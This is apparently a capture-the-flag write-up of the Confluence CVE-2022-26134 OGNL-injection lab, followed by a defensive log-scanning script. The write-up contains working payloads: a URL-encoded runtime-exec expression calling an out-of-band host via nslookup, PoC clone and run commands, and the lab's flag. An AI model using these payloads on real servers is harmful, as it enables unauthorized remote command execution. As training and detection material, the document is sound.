aldern00b

Atlassian, CVE-2022-26134 - THM

An interactive lab showcasing the Confluence Server and Data Center unauthenticated RCE vulnerability.

This CVE is an injection flaw in OGNL (Object-Graph Navigation Language), an expression language for Java (surprise, surprise ... it's Java). OGNL is used for getting and setting properties of Java objects, amongst many other things.


Impacted versions are:

  • 7.4.17
  • 7.13.7
  • 7.14.3
  • 7.15.2
  • 7.16.4
  • 7.17.4
  • 7.18.1

To tell whether a server is vulnerable, we can request this URL:

https[:]//yourconfluenceserver[.]com/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20cadcl3mfo0aeq0000010mmku8891cnyrp.oast.me%22%29%7D/

If we decode it, here is how it would look:

https://yourconfluenceserver[.]com/${@java.lang.Runtime@getRuntime().exec("nslookup cadcl3mfo0aeq0000010mmku8891cnyrp.oast.me")}/

To exploit this vulnerability in OGNL, we make an HTTP GET request and place the payload in the URI path. For example, we can instruct the Java runtime to execute a command such as creating a file on the server:

${@java.lang.Runtime@getRuntime().exec("touch /tmp/thm/")}/

This will need to be URL encoded, in the same way as the URL shown earlier. You can use an online URL encoder for your payloads (note that your curl payload will need to end in a trailing / and not %2F):


First, we need to download the PoC to our host. I decided to clone the repository with git for this room.

  1. git clone https://github.com/Nwqda/CVE-2022-26134
  2. cd CVE-2022-26134

After changing into the source directory, let's execute the script. Replace COMMAND with the command you wish to execute (remember to use quotation marks around commands that contain spaces or special characters):

  1. python3.9 cve-2022-26134.py HTTP://10.10.244.78:8090 COMMAND

You HAVE to use python version 3.9 for this script to work.

Here's what the target looks like in an Nmap scan:


I notice a login page too:

As we peek around, the README of the PoC we downloaded gives some example URLs we can use:



Craft a payload to identify what user the application is running as. What is the user? confluence

python3.9 cve-2022-26134.py http://10.10.244.78:8090 whoami

Finally, craft a payload to retrieve the flag stored at /flag.txt on 10.10.244.78. What is the flag? THM{OGNL_VULN}

python3.9 cve-2022-26134.py http://10.10.244.78:8090 "less /flag.txt"

If we walk through the Python script, we can see it takes three arguments: the target, the command, and the version, which is passed automatically and run first. The script first checks that it gets a 200 response code from the base URI.

Then we see it build the payload below and check for a 302 status in the response.

%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getR$
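From the defender's side, the same two facts the PoC relies on (an OGNL expression percent-encoded into the request path, and a 302 response from a vulnerable server) are what you hunt for in web-server access logs. The following is an added example, not code from the original post or from the PoC repository: it percent-decodes each request URI (repeatedly, so double encoding does not hide the expression), flags any URI that contains an OGNL opener `${` together with the `@class@member` static-call syntax the published payloads use, and marks the hit as `ognl-exec` when a `.exec(` call is present. The log lines are constructed for this example and follow the Combined Log Format; the log regex and the severity labels are my own assumptions, not something Confluence or the PoC defines.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Combined Log Format), not taken from the
# original post. Line 2 carries a URL-encoded OGNL expression like the one
# decoded above; line 3 is benign but contains braces, to show that "{" alone
# does not fire the rule; line 4 is the same expression double-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Jun/2022:10:01:12 +0000] "GET /login.action HTTP/1.1" 200 5120
10.0.0.9 - - [03/Jun/2022:10:02:44 +0000] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29%7D/ HTTP/1.1" 302 0
10.0.0.7 - - [03/Jun/2022:10:03:01 +0000] "GET /dosearchsite.action?queryString=%7Btest%7D HTTP/1.1" 200 9000
10.0.0.9 - - [03/Jun/2022:10:03:30 +0000] "GET /%2524%257B%2540java.lang.Runtime%2540getRuntime%2528%2529%257D/ HTTP/1.1" 302 0
"""

# Assumed log layout: source IP, ident, user, [timestamp], "METHOD URI PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)

# OGNL markers, evaluated on the decoded URI:
#   ${        opens an OGNL expression in the path
#   @a.b@c    static member reference, e.g. @java.lang.Runtime@getRuntime
#   .exec(    the runtime call used to run an OS command
OGNL_OPEN = re.compile(r"\$\{")
OGNL_STATIC = re.compile(r"@[A-Za-z_][\w.]*@[A-Za-z_]\w*")
OGNL_EXEC = re.compile(r"\.exec\s*\(")


def decode_uri(uri: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so double encoding cannot hide `${`."""
    cur = uri
    for _ in range(rounds):
        nxt = unquote(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur


def classify_uri(uri: str):
    """Return None for a benign URI, otherwise 'ognl' or 'ognl-exec'."""
    decoded = decode_uri(uri)
    if not (OGNL_OPEN.search(decoded) and OGNL_STATIC.search(decoded)):
        return None
    return "ognl-exec" if OGNL_EXEC.search(decoded) else "ognl"


def scan_log(text: str):
    """Parse each log line and collect the requests that look like OGNL injection."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a production job would count these
        verdict = classify_uri(m["uri"])
        if verdict:
            hits.append({
                "src": m["src"],
                "ts": m["ts"],
                "status": int(m["status"]),  # 302 is what the PoC treats as success
                "verdict": verdict,
                "decoded": decode_uri(m["uri"]),
            })
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"{h['ts']} {h['src']} {h['verdict']:10} status={h['status']} {h['decoded']}")
```

Matching on the decoded form rather than on the raw `%24%7B` bytes is the important choice: the same expression can be encoded in several ways, and a rule keyed to one encoding is trivially evaded. Pairing a path hit with a 302 status tells you which of the attempts actually reached a vulnerable code path, which is the request to prioritise during incident response.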
